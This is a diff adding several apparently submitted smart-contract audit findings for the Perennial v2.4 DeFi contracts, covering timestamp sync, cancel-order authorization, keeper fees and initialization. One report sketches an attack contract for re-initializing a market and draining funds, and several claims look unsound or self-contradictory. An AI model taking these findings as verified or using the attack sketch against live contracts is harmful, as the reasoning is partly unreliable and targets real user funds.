necessary for security, the current implementation's rigid requirements create operational challenges in real-world distributed environments. This analysis examines how excessive timestamp matching requirements lead to system failures and proposes architectural improvements to balance security with operational reliability. + +The vulnerability arises from an overly rigid timestamp equality check in the vault's `_loadContext` function: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/vault/contracts/Vault.sol#L512 + +```solidity +if (context.currentTimestamp == type(uint256).max) context.currentTimestamp = currentTimestamp; +else if (currentTimestamp != context.currentTimestamp) revert VaultCurrentOutOfSyncError(); +``` + +This implementation requires exact timestamp matching across all oracle status calls. When processing oracle data through `registration.market.oracle().status()`, even minimal timestamp variations trigger a `VaultCurrentOutOfSyncError`, halting vault operations. + +The issue manifests in distributed oracle networks where update propagation isn't instantaneous. Consider a scenario where Market A receives an oracle update at t=1000000 and Market B at t=1000001 - a mere 1ms difference causes the entire transaction to revert. This strict synchronization requirement fails to account for inherent network latency and blockchain-specific timing variations. + +The problem compounds in cross-chain environments where clock drift becomes inevitable: +```solidity +(OracleVersion memory oracleVersion, uint256 currentTimestamp) = registration.market.oracle().status(); +``` +Each oracle call may encounter slightly different network conditions or blockchain timestamps, creating race conditions during near-simultaneous updates. The first oracle sets `currentTimestamp`, but subsequent reads within the same block may capture newer timestamps, forcing unnecessary reverts despite prices being current and valid. + +## Fix +Incorporate timestamp tolerance. \ No newline at end of file diff --git a/052.md b/052.md new file mode 100644 index 0000000..82bbf07 --- /dev/null +++ b/052.md @@ -0,0 +1,96 @@ +Cheerful Taffy Dolphin + +High + +# Missing Execution Rights Validation in _cancelOrder() Enables Front-Running of Signed Cancel Orders and Market Manipulation + +## Summary +The protocol implements two cancellation paths: direct cancellation and signature-based cancellation, utilizing EIP712 signatures for off-chain authorization. The Manager contract coordinates with an OrderVerifier for signature validation and a MarketFactory for operator permissions. A security review of this system reveals a significant authorization vulnerability in the order cancellation flow. + +The issue stems from the dual authorization paths in the order cancellation system. In the Manager contract, direct cancellations flow through: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L112 + +```solidity +function cancelOrder(IMarket market, uint256 orderId) external { + _cancelOrder(market, msg.sender, orderId); +} +``` + +This path implicitly ensures authorization as the `account` parameter passed to `_cancelOrder` is `msg.sender`. However, in the signature-based path: + +```solidity +function cancelOrderWithSignature(CancelOrderAction calldata request, bytes calldata signature) + external + keepAction(request.action, abi.encode(request, signature)) +{ + verifier.verifyCancelOrder(request, signature); + _cancelOrder(request.action.market, request.action.common.account, request.action.orderId); +} +``` + +it delegates authorization to the OrderVerifier contract, which validates through EIP712 signatures: + +```solidity +function _verifySignature(Action calldata action, bytes32 hash, bytes calldata signature) internal view { + if (!SignatureChecker.isValidSignatureNow( + action.common.signer, + _hashTypedDataV4(hash), + signature + )) revert VerifierInvalidSignerError(); +} +``` + +The authorization check in OrderVerifier only validates that the signer is authorized: + +```solidity +function _authorized(address account, address signer) internal view override returns (bool) { + return super._authorized(account, signer) || marketFactory.signers(account, signer); +} +``` + +The critical vulnerability lies in `_cancelOrder` lacking execution authorization: + +```solidity +function _cancelOrder(IMarket market, address account, uint256 orderId) private { + TriggerOrder memory order = _orders[market][account][orderId].read(); + if (order.isEmpty() || order.isSpent) revert ManagerCannotCancelError(); + order.isSpent = true; + _orders[market][account][orderId].store(order); + emit TriggerOrderCancelled(market, account, orderId); +} +``` + +This creates a security gap where anyone can execute a signed cancellation order. While the signature proves intent from an authorized signer, there's no validation of the executing party (`msg.sender`). This enables front-running attacks where malicious actors could execute signed cancellations before the intended executor. + +## Impact + +The authorization vulnerability in _cancelOrder has severe implications for the trigger order system's integrity. Any party can execute a signed cancel order without execution rights, enabling front-running of cancellations in volatile market conditions. Adversaries could manipulate the timing of order cancellations to their advantage, particularly damaging in a DeFi context where order execution sequence directly impacts profit/loss outcomes. Given that the Manager contract handles trigger orders for positions in trading markets, unauthorized control over cancellation timing could be exploited to manipulate market positions and force unfavorable execution conditions. + +## Fix +The fix requires adding operator validation in `_cancelOrder`: + +```solidity +function _cancelOrder(IMarket market, address account, uint256 orderId) private { + if (msg.sender != account && !marketFactory.operators(account, msg.sender)) + revert ManagerNotOperatorError(); + + TriggerOrder memory order = _orders[market][account][orderId].read(); + if (order.isEmpty() || order.isSpent) revert ManagerCannotCancelError(); + order.isSpent = true; + _orders[market][account][orderId].store(order); + emit TriggerOrderCancelled(market, account, orderId); +} +``` + +This aligns with the contract's existing operator check pattern, seen in the claim function: + +```solidity +modifier onlyOperator(address account, address operator) { + if (account != operator && !marketFactory.operators(account, operator)) + revert ManagerNotOperatorError(); + _; +} +``` + +The vulnerability has significant implications for market operations, particularly during volatile conditions where order cancellation timing is critical. The fix establishes proper dual-layer authorization: signature validation for intent and operator validation for execution rights. \ No newline at end of file diff --git a/053.md b/053.md new file mode 100644 index 0000000..3147e2d --- /dev/null +++ b/053.md @@ -0,0 +1,66 @@ +Cheesy Pebble Kookaburra + +Medium + +# `Controller::withdrawWithSignature` may not work due to wrong assumption of 1 DSU = 1 USDC + +### Summary + +This issue was reported in a previous audit 2024 [here](https://github.com/sherlock-audit/2024-08-perennial-v2-update-3-judging/issues/35) and also in a previous audit 2023 [here](https://github.com/sherlock-audit/2023-07-perennial-judging/issues/22). However, in the collateral `Account` the same issue still exists with assuming 1:1 unwrapping of `DSU` into `USDC` when `reserve.redeem(amount)` is called. + +As a consequence, `Controller::withdrawWithSignature()` and `ControllerIncentivized::withdrawWithSignature()` may not work due to this issue. + +### Root Cause + + + +In `Account::withdraw()`, `USDC` may be [unwrapped](https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Account.sol#L81) from `DSU` to facilitate withdrawal by calling `reserve.redeem(amount)` in Account.sol line 103. + +However the redeem price may be below 1 in the reserve implementation: + +```solidity +function redeemPrice() public view returns (UFixed18) { + // if overcollateralized, cap at 1:1 redemption / if undercollateralized, redeem pro-rata + return assets().unsafeDiv(dsu.totalSupply()).min(UFixed18Lib.ONE); +} +``` + +`Account::withdraw()` then calls `USDC.push(owner, pushAmount)` with `pushAmount` being the `amount`. However since unwrapping `DSU` to `USDC` may not result in 1:1 conversion, this may revert when trying to send more `USDC` to the owner than the contract has. + + +Code snippets: + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Controller.sol#L228 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Controller_Incentivized.sol#L165 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/periphery/contracts/CollateralAccounts/Account.sol#L75-L85 + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +_No response_ + +### Impact + +`Controller::withdrawWithSignature()` and `ControllerIncentivized::withdrawWithSignature()` may not work due to this issue. + +### PoC + +_No response_ + +### Mitigation + +Consider adjusting `Account::withdraw()` to transfer the difference between balance before and balance after, similar as in MultiInvoker.sol line 398: + +```solidity +// Account::withdraw() +83 UFixed6 pushAmount = amount.eq(UFixed6Lib.MAX) ? USDC.balanceOf() : USDC.balanceOf().sub(usdcBalance); +``` \ No newline at end of file diff --git a/054.md b/054.md new file mode 100644 index 0000000..d28a200 --- /dev/null +++ b/054.md @@ -0,0 +1,92 @@ +Clean Hemp Barracuda + +Medium + +# Inaccurate Keeper Fee in Order Execution + +### Summary + +The applicableGas is 0, and the KeepConfig has multiplier Base set to 0. This means the fee calculation would be (0 + bufferBase) * gasPrice, which ignores the actual gas used. + +Therefore, the _executeOrder function has the issue, where keeper fees aren't accurately calculated based on real gas consumption. This would lead to keepers being underpaid and potentially refusing to execute orders, harming protocol functionality. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/MultiInvoker/MultiInvoker.sol#L433 + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/MultiInvoker/MultiInvoker.sol#L438 + + + +### Root Cause + +The `_executeOrder` function in the `MultiInvoker` contract miscalculates keeper fees by **hardcoding `applicableGas = 0`**, bypassing actual gas usage tracking. This leads to fees that do not reflect real transaction costs. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +**Scenario**: +1. User Action: Alice places a trigger order with a `fee = 10 DSU`. +2. Keeper Exec: Bob calls `_executeOrder`, spending **80,000 gas**. +3. **Fee Calculation**: + - `applicableGas` is **0** (hardcoded). + - `fee = (0 + keepBufferBase) * gasPrice = (0 + 10,000) * 20 gwei = 0.0002 ETH` (converted to DSU). + - Actual cost: **80,000 gas * 20 gwei = 0.0016 ETH**. +4. Outcome: + - Keeper receives **0.0002 ETH** but spent **0.0016 ETH**. + - **Loss**: 0.0014 ETH per transaction. Keepers stop executing orders over time. + +**Code Reference**: +```solidity +function _executeOrder(...) internal { + _handleKeeperFee( + KeepConfig( + UFixed18Lib.ZERO, // multiplierBase = 0 + keepBufferBase, // e.g., 10,000 gas + UFixed18Lib.ZERO, + keepBufferCalldata + ), + 0, // ❌ Hardcoded `applicableGas = 0` + msg.data[0:0], + 0, + abi.encode(...) + ); +} +``` + +### Impact + +- **Underpaid Keepers**: Fees are based on static buffers (e.g., `keepBufferBase`) instead of real gas usage, causing financial losses for keepers. +- **Protocol Dysfunction**: Persistent underpayment disincentivizes keepers from executing orders, leading to unprocessed orders and user frustration. + +### PoC + +_No response_ + +### Mitigation + +1. **Track Gas Usage**: Measure `gasleft()` before and after order execution. +2. **Pass Actual Gas**: Use the difference to calculate fees. + +**Fixed Code**: +```solidity +function _executeOrder(...) internal { + uint256 startGas = gasleft(); // ✅ Capture initial gas + + // ... execute order logic ... + + uint256 gasUsed = startGas - gasleft(); // ✅ Calculate actual gas + _handleKeeperFee( + KeepConfig(...), + gasUsed, // ✅ Pass real gas usage + msg.data[0:0], + 0, + abi.encode(...) + ); +} +``` \ No newline at end of file diff --git a/055.md b/055.md new file mode 100644 index 0000000..fbdca31 --- /dev/null +++ b/055.md @@ -0,0 +1,78 @@ +Clean Hemp Barracuda + +Medium + +# Incomplete Gas Tracking in Order Execution + +### Summary + +The `executeOrder` function in the `Manager` contract miscalculates keeper fees by excluding the gas consumed during the fee handling process itself. This results in undercompensation for keepers, as the fee calculation does not account for the entire gas usage of the transaction. +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L145 + +### Root Cause + +the applicableGas is startGas (before the order execution) minus gasleft() after the order execution but before the keeper fee handling. So the gas used for the order execution is captured, but the gas used for the keeper fee handling itself is not included. However, the keeper fee handling is part of the transaction, so the fee should cover the entire gas used, including the +_handleKeeperFee logic. + +But in the current code, applicable Gas does not include the gas used by _handleKeeperFee. This could lead to underpayment because the keeper's gas cost includes the fee handling, but the fee calculation doesn't account for it. + +For example: +1. Keeper calls execute Order, gas used for executing the order is 80,000. +2. Then, applicable Gas is 80,000, fee is calculated based on that. +3. But the *handleKeeperFee function itself consumes gas (e.g., 20,000), so total gas used is 100,000. However, the keeper is only compensated for 80,000, leading to a loss + +This is a flaw because the keeper's total gas usage includes the fee handling, but the fee calculation doesn't include it. + +This would result in the keeper being undercompensated for the full gas cost of the transaction, including the fee handling logic. + +The fix would be to measure the gas used after all operations, including the _handleKeeperFee. However, in the current code, applicableGas is calculated before calling *handleKeeperFee, so the gas used by *handle KeeperFee is not included. + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +**Scenario**: +1. **Keeper Action**: Bob executes an order, consuming **80,000 gas** for order logic and **20,000 gas** for fee handling. +2. **Fee Calculation**: + - `applicableGas = 80,000` (order logic only). + - `fee = (80,000 + buffer) * gasPrice`. +3. **Outcome**: + - Keeper is paid for **80,000 gas** but spent **100,000 gas** (total transaction). + - **Loss**: 20,000 gas per transaction. Keepers stop executing orders over time. + +**Code Reference**: +```solidity +function executeOrder(...) external { + uint256 startGas = gasleft(); + // ... order execution logic ... + uint256 applicableGas = startGas - gasleft(); // Measures gas used by order logic only + _handleKeeperFee(...); // Additional gas used here is not tracked +} +``` + +### Impact + +- **Underpaid Keepers**: Keepers incur gas costs for both executing the order and processing the fee, but are only reimbursed for the former. This leads to financial losses for keepers. +- **Protocol Dysfunction**: Persistent underpayment discourages keepers from executing orders, causing order backlog and degraded user experience. + +### PoC + +_No response_ + +### Mitigation + +1. **Measure Total Gas**: Calculate `applicableGas` after all logic, including fee handling. +2. **Adjust Gas Tracking**: + ```solidity + uint256 startGas = gasleft(); + // ... order execution and fee handling logic ... + uint256 totalGasUsed = startGas - gasleft(); + _handleKeeperFee(..., totalGasUsed, ...); + ``` +3. **Note**: This requires restructuring to ensure `_handleKeeperFee` is included in gas measurement. \ No newline at end of file diff --git a/056.md b/056.md new file mode 100644 index 0000000..4a20075 --- /dev/null +++ b/056.md @@ -0,0 +1,54 @@ +Clean Hemp Barracuda + +Medium + +# Front-Runnable `maxFee` Reduction + +### Summary + +Users can reduce the `maxFee` of an existing order, creating a race condition where keepers may execute orders at lower fees than initially promised. + +point is the placeOrder function. It allows updating an order with a lower maxFee, which might let users reduce fees after keepers have already committed gas. This creates a race +condition where keepers might not get paid adequately, leading to potential +losses. + +### Root Cause + + +**Code Reference**: +```solidity +function _placeOrder(...) private { + if (!old.isEmpty() && old.maxFee.gt(order.maxFee)) + revert ManagerCannotReduceMaxFee(); // ❌ Only prevents reducing maxFee, not front-running +} +``` + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + +**Scenario**: +1. **User Action**: Alice places an order with `maxFee = 10 DSU`. +2. **Keeper Sees Order**: Begins processing, expecting `10 DSU`. +3. **User Front-Runs**: Updates order to `maxFee = 5 DSU`. +4. **Result**: Keeper receives `5 DSU` but spent gas based on `10 DSU`. + +### Impact + +- **Keeper Losses**: Keepers commit gas expecting a higher fee, but receive less after a user front-runs the transaction. +- **Protocol Trust**: Users can exploit this to underpay keepers, damaging protocol credibility. + +### PoC + +_No response_ + +### Mitigation + +- Enforce a minimum fee increase threshold (e.g., `newMaxFee ≥ oldMaxFee * 0.9`). +- Implement a time-delay for fee reductions. \ No newline at end of file diff --git a/057.md b/057.md new file mode 100644 index 0000000..8b9553c --- /dev/null +++ b/057.md @@ -0,0 +1,60 @@ +Clean Hemp Barracuda + +High + +# Irreversible Order State on Fee Handling Failure + +### Summary + +looking at the Manager `_raiseKeeper` Fee function, it uses controller. chargeFee to pull fees from the user's account. If chargeFee fails (e.g., insufficient funds), the entire transaction reverts. But the order is already marked as spent, so the user can't retry. This could lock funds permanently, which is a critical problem. + +If `_raiseKeeperFee` fails (e.g., due to insufficient user funds), the order is marked as `isSpent = true`, but the fee is not charged. This permanently locks the order, preventing retries. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L186 + +### Root Cause + + +**Code Reference**: +```solidity +function executeOrder(...) external { + // ... marks order as spent BEFORE fee handling ... + order.isSpent = true; // ❌ State changed before fee transfer + _handleKeeperFee(...); // May revert due to insufficient funds +} +``` + + +### Internal Pre-conditions + +_No response_ + +### External Pre-conditions + +_No response_ + +### Attack Path + + +**Scenario**: +1. **User Action**: Alice places an order with `maxFee = 5 DSU`. +2. **Keeper Execution**: Bob spends gas to execute the order. +3. **Failure**: Alice’s account has only `3 DSU`, causing `_raiseKeeperFee` to revert. +4. **Result**: Order is marked `isSpent`, but Alice cannot retry. + + + + +### Impact + +- **Funds Locked**: Users cannot retry failed orders, losing access to their collateral. +- **Denial-of-Service**: Attackers can exploit this to lock legitimate users’ orders. + +### PoC + +_No response_ + +### Mitigation + +- Mark orders as spent **after** successful fee handling. +- Use a temporary state to track execution progress. \ No newline at end of file diff --git a/058.md b/058.md new file mode 100644 index 0000000..355ea45 --- /dev/null +++ b/058.md @@ -0,0 +1,31 @@ +Jovial Ocean Elk + +High + +# Incorrect use of nagative values in `maintained()` and `margined()` function in `Position.sol` + +## Summary +The `maintained()` and `margin()` functions wrongly handle negative collateral values making a path for undercollateralized positions to appear solvent. + +## Vulnerability Details +```solidity +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Position.sol#L211-L217 +``` +```solidity +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/types/Position.sol#L242-L250 + +``` +`maintained()` and `margin()` functions +collateral is stored as `Fixed6` which is `signed` but later converted to `UFIXED6` which is `unsigned` using `UFixed6Lib.unsafeFrom(collateral)`. +The negative values are wrapped around to large set of numbers due to two representation `-100` → `2^256 - 100` which will cause the check to return true for negative collateral. + +## Impact +Malicious users can maintain positions with negative collaterals bypassing solvency checks. +Malicious actors can also borrow funds without collateralizing. + + +## Tools Used +Manual review. + +## Recommendations +Revert or return false if collateral is negative unless position is empty. diff --git a/059.md b/059.md new file mode 100644 index 0000000..5435f4d --- /dev/null +++ b/059.md @@ -0,0 +1,94 @@ +Noisy Quartz Bird + +High + +# Storage Manipulation Attack using `_version` in initialization process + +### Summary +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/core/contracts/Market.sol#L120-L128 +```solidity +/// @dev The initialized flag + Uint256Storage private constant _version = Uint256Storage.wrap(keccak256("equilibria.root.Initializable.version")); + + /// @dev The initializing flag + BoolStorage private constant _initializing = BoolStorage.wrap(keccak256("equilibria.root.Initializable.initializing")); + + /// @dev Can only be called once per version, `version` is 1-indexed + modifier initializer(uint256 version) { + if (version == 0) revert InitializableZeroVersionError(); + if (_version.read() >= version) revert InitializableAlreadyInitializedError(version); + + _version.store(version); + _initializing.store(true); + + _; + + _initializing.store(false); + emit Initialized(version); + } +``` + `_version` is critical to upgrade security. +If it is reset, manipulated, or bypassed, an attacker can take over the contract via re-initialization or forced downgrades. +If `_version` is stored in an upgradeable proxy’s storage, an attacker could overwrite it and re-trigger `initialize()`, bypassing security. +This attack is a serious risk in upgradeable contracts. +Many real-world exploits involve storage overwrites, making `_version` a critical weakness. +https://solodit.cyfrin.io/issues/changing-_initializableslot-can-cause-_disableinitializers-to-actually-enable-initializers-spearbit-none-coinbase-solady-pdf + +### PoC +Since `_version` is used to track the initialization state, if an attacker finds a way to corrupt or reset _version, they can re-trigger initialize(). + +Attack Steps +Find a Storage Collision or Overwrite `_version` + +If `_version` is stored in an upgradeable proxy contract, an attacker could override this slot by deploying a malicious contract that writes over the same storage index. +Example Attack Contract: +```solidity +contract StorageCorruptor { + function overwriteVersion(address target) public { + bytes32 slot = keccak256("equilibria.market.version"); // Hypothetical storage slot + assembly { + sstore(slot, 0) // Force `_version` back to 0 + } + IMarket(target).initialize(IMarket.MarketDefinition(...)); // Reinitialize! + } +} +``` +This forces `_version = 0`, bypassing the initializer(1) check. +Call `initialize()` Again + +After corrupting `_version`, the attacker calls initialize() again to replace the token and oracle with malicious versions. +Outcome +The attacker resets initialization. +They replace the token with a malicious ERC-20 that allows infinite minting. +They set oracle to a fake price feed, allowing market manipulation. +They drain all user funds by exploiting liquidity rules. + +### Recommendation +How to Fix This? +1. Store `_version` in an Immutable Contract +If `_version` is only stored in a proxy contract, it becomes easier to overwrite. +Moving `_version` into an immutable logic contract removes this attack vector. +Double-Lock Initialization with a Boolean Flag + +```solidity +bool private _isInitialized; +modifier initializer(uint256 version) { + require(!_isInitialized, "Already initialized"); + _isInitialized = true; + _; +} +``` +This prevents any form of re-initialization. +Use Explicit Storage Slots for Upgradeable Contracts + +Instead of keccak256("some string"), explicitly define storage slots to prevent overwrites. +2. Use a Hard Upgrade Lock +```solidity +require(_version == expectedVersion, "Version mismatch!"); +``` +Blocks reverting to older versions. + +3. Verify `_version` Before Upgrading +```solidity +require(proxyAdmin.getVersion() == latestVersion, "Cannot upgrade from old version"); +``` diff --git a/060.md b/060.md new file mode 100644 index 0000000..ceb1ced --- /dev/null +++ b/060.md @@ -0,0 +1,52 @@ +Cheesy Clay Dinosaur + +Medium + +# Front-Running Vulnerability in executeOrder() of Manager.sol + +### Summary + +In Manager.sol, inside executeOrder(), the order state (isSpent = true;) is updated after execution, allowing: + +**Front-running:** Attackers can monitor the mempool, execute the same order with higher gas fees, and get their transaction mined first. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/main/perennial-v2/packages/periphery/contracts/TriggerOrders/Manager.sol#L157-L163 + +### Root Cause + +_No response_ + +### Internal Pre-conditions + +1. A valid pending order exists for a market. +2. An attacker monitors the mempool for executeOrder() calls. +3. The contract does not enforce immediate invalidation (isSpent is set after execution). + +### External Pre-conditions + +1. Ethereum mempool must be publicly accessible, allowing attackers to see pending executeOrder() transactions. +2. MEV bots or attackers must have faster gas-adjusting strategies to submit transactions with higher gas. + +### Attack Path + +1. User submits a valid order execution: ```executeOrder(ETHMarket, Alice, 123);``` +2. Attacker detects the transaction in the mempool. +3. Attacker submits an identical transaction but with higher gas fees. ```executeOrder(ETHMarket, Alice, 123); // Attacker front-runs this order``` +4. The attacker's transaction is mined first, executing Alice’s order under their control. +5. Alice's original transaction gets mined later, failing due to order.isSpent = true;. + + +### Impact + +Users suffer losses due to manipulated execution prices. MEV bots or malicious actors gain unfair advantages over legitimate users. +Some examples of impact, +1. A stop-loss order is front-run, and the attacker buys at a lower price before it executes. +2. The user’s stop-loss gets triggered at a worse price, and the attacker sells at a profit. + +### PoC + +_No response_ + +### Mitigation + +_No response_ \ No newline at end of file diff --git a/061.md b/061.md new file mode 100644 index 0000000..9bfcc58 --- /dev/null +++ b/061.md @@ -0,0 +1,90 @@ +Dazzling Pastel Gibbon + +High + +# the “creating a new checkpoint” process + +When the contract calls _update(), which then invokes _checkpoint(context), it correctly generates an updated context.currentCheckpoint and stores it in _checkpoints[newId]. However, it never writes this new checkpoint’s ID back to the global state (context.global.current). + +As a result, the subsequent settlement logic (_settle())—which relies on iterating through context.global.current and context.global.latest—fails to detect the newly created checkpoint. This ultimately isolates the new checkpoint, making it impossible to be processed properly. + +https://github.com/sherlock-audit/2025-01-perennial-v2-4-update/blob/2381b47e69b17fe892b1d1d0f467c358cf950143/perennial-v2/packages/vault/contracts/Vault.sol#L297 +Detailed Explanation of the Bug + +1. A new checkpoint is created but context.global.current is not updated +```solidity +function _checkpoint(Context memory context) private view { + // 1) Fetch the "current" context.global.current + context.currentId = context.global.current; + context.currentCheckpoint = _checkpoints[context.currentId].read(); + + // 2) If now > current checkpoint.timestamp, increment currentId + // and modify the new checkpoint in memory + if (context.currentTimestamp > context.currentCheckpoint.timestamp) { + context.currentId++; + context.currentCheckpoint.next(context.currentTimestamp, context.global); + } +} +``` + • Here, context.currentId may be incremented, but this change only happens locally. + • The new context.currentId is never written back to context.global.current. + +2. The new checkpoint is stored, but context.global.current remains unchanged +```solidity +function _saveContext(Context memory context, address account) private { + if (account != address(0)) _accounts[account].store(context.local); + _accounts[address(0)].store(context.global); + + // The new checkpoint is stored in _checkpoints + _checkpoints[context.currentId].store(context.currentCheckpoint); + + // However, context.currentId is NOT written back to context.global.current + // This means the global "current" ID does not advance. +} +``` + • The contract correctly saves the new checkpoint in _checkpoints[...]. + • However, it never updates context.global.current, meaning the global state does not recognize that a new checkpoint was created. + +3. _settle() relies on context.global.current > context.global.latest to process new checkpoints +```solidity +while ( + context.global.current > context.global.latest && + ... +) { + // Only then does it proceed to call nextCheckpoint.complete(...) +} +``` + • _settle() only processes checkpoints that context.global.current acknowledges. + • Since context.global.current was never updated, _settle() never sees the newly created checkpoint. + • As a result, the settlement logic skips the new checkpoint, leaving it orphaned and preventing it from being finalized. + +Fixing the Issue + +A standard fix is to update _checkpoint() or _saveContext() so that the incremented context.currentId is written back to context.global.current. This ensures that the global state is aware of the newly created checkpoint. + +Fixed Version of _checkpoint() and _saveContext() +```solidity +function _checkpoint(Context memory context) private view { + context.currentId = context.global.current; + context.currentCheckpoint = _checkpoints[context.currentId].read(); + + if (context.currentTimestamp > context.currentCheckpoint.timestamp) { + context.currentId++; + context.currentCheckpoint.next(context.currentTimestamp, context.global); + } +} + +function _saveContext(Context memory context, address account) private { + if (account != address(0)) _accounts[account].store(context.local); + + // FIX: Write context.currentId back to context.global.current + context.global.current = context.currentId; + _accounts[address(0)].store(context.global); + + _checkpoints[context.currentId].store(context.currentCheckpoint); +} +``` +Why This Fix Works + 1. The new checkpoint’s ID is now stored in context.global.current, making it globally recognized. + 2. _settle() can now detect the new checkpoint and process it correctly. + 3. The contract no longer leaves checkpoints orphaned and ensures proper settlement \ No newline at end of file diff --git a/invalid/.gitkeep b/invalid/.gitkeep new file mode 100644 index 0000000..e69de29